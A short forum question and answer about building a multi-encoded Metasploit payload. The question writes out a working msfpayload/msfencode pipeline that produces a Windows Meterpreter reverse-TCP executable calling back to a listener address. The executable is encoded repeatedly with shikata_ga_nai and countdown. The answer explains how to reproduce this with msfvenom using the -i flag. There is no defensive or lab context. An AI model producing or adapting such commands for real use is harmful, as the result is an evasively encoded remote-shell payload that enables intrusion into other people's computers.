# how to generate multi encode payload using metasploit

Tags: metasploit

in the previous version of metasploit we could use this code to generate multi encode payload :

```
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.217.133
LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t raw | msfencode -e x86/shikata_ga_nai -c 9 -t exe >payload.exe
```

but msfvenom replaced in new version ...
how i can make multi encode payload by msfvenom ?
sorry for bad english

Answer (score 0):

you can just "replace msfpayload and msfencode" in your script by "msfvenom"

and "-i" instead of "-c" for the number of iterations or the number of time to encode the payload

you can type in your terminal

msfvenom

or

msfvenom -h

if you knew msfpayload & encode, you should be able to use msfvenom without trouble, same mechanism

For more refer to

https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

HOpe you find what you looking for !